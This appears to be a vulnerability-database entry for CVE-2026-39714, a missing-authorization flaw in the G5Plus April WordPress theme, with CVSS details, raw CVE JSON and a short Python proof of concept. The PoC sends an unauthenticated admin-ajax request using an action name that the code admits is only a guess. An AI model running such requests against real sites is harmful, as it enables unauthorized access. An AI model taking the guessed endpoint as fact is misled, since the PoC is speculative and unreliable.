Security Vulnerability Report
中文
CVE-2026-39714 CVSS 5.3 MEDIUM

CVE-2026-39714

Published: 2026-04-08 09:16:44
Last Modified: 2026-04-24 18:05:09

Description

Missing Authorization vulnerability in G5Theme G5Plus April g5plus-april allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects G5Plus April: from n/a through <= 6.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

G5Plus April <= 6.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: G5Plus April Missing Authorization PoC # Date: 2026-04-08 # Vulnerable Version: <= 6.8 # Target URL (replace with actual target) target_url = "http://example.com/wp-admin/admin-ajax.php" # The vulnerable action often lacks a capability check such as 'manage_options' # 'action' parameter needs to be fuzzed or identified from source code payload = { "action": "g5plus_import_data", # Example vulnerable action name "security": "false" } try: # Send request without authentication cookies response = requests.post(target_url, data=payload) if response.status_code == 200: # Check if response contains sensitive data or confirms access if "success" in response.text or "data" in response.text: print("[+] Vulnerability exploited successfully!") print("[+] Response:") print(response.text) else: print("[-] Request sent, but exploitation could not be confirmed.") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39714", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:44.400", "lastModified": "2026-04-24T18:05:09.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in G5Theme G5Plus April g5plus-april allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects G5Plus April: from n/a through <= 6.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/g5plus-april/vulnerability/wordpress-g5plus-april-theme-6-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}